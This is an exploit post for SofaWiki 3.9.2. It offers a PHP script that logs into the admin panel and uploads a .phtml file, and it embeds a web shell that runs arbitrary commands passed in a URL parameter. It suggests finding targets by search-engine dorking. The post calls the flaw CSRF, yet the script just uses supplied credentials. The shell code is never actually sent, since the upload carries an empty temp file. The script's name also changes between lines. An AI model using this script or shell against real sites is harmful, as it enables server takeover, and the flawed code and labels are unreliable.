=============================================================================================================================================
| # Title     : SofaWiki 3.9.2 shell upload Vulnerability                                                                                   |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits)                                                            |
| # Vendor    : https://www.sofawiki.com/site/files/snapshot.zip                                                                            |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] Code Description: The script performs an attack on a website's control panel by exploiting CSRF vulnerabilities and uploading a shell via the website's administrative interface.

   (Related : https://packetstorm.news/files/id/178203/ Related CVE numbers:  ) .
	
[+] save code as poc.php.

[+] Usage: script.php <base_url> <username> <password>

[+] PayLoad :

<?php
if ($argc < 4) {
    echo "Usage: php exploit.php <base_url> <username> <password>\n";
    exit(1);
}

$base_url = $argv[1];
$username = $argv[2];
$password = $argv[3];

$filename = rand(10000, 99999) . ".phtml";

$ch = curl_init();

$login_url = $base_url . "/index.php";
$login_data = [
    "submitlogin" => "Login",
    "username" => $username,
    "pass" => $password,
    "name" => "SofaWiki",
    "action" => "login"
];

echo "Exploiting...\n";
sleep(1);

curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $login_data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);

if (strpos($response, "Logout") === false) {
    echo "Login failed: " . $response . "\n";
    exit();
}

echo "Login Successful\n";
sleep(1);

$php_shell_code = <<<EOT
<html>
<body>
<form method="GET" name="<?php echo basename(\$_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset(\$_GET['cmd']))
{
    system(\$_GET['cmd']);
}
?>
</pre>
</body>
</html>
EOT;

echo "Shell uploading...\n";
sleep(1);

$upload_url = $base_url . "/index.php";
$files = [
    "uploadedfile" => new CURLFile(tempnam(sys_get_temp_dir(), 'php'), "text/php", $filename),
    "action" => "uploadfile",
    "MAX_FILE_SIZE" => "8000000",
    "filename" => $filename,
    "content" => "content"
];

curl_setopt($ch, CURLOPT_URL, $upload_url);
curl_setopt($ch, CURLOPT_POSTFIELDS, $files);
$response = curl_exec($ch);

if ($response) {
    echo "Your shell is ready: {$base_url}/site/files/{$filename}\n";
} else {
    echo "Upload failed: " . $response . "\n";
}

curl_close($ch);
?>





Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================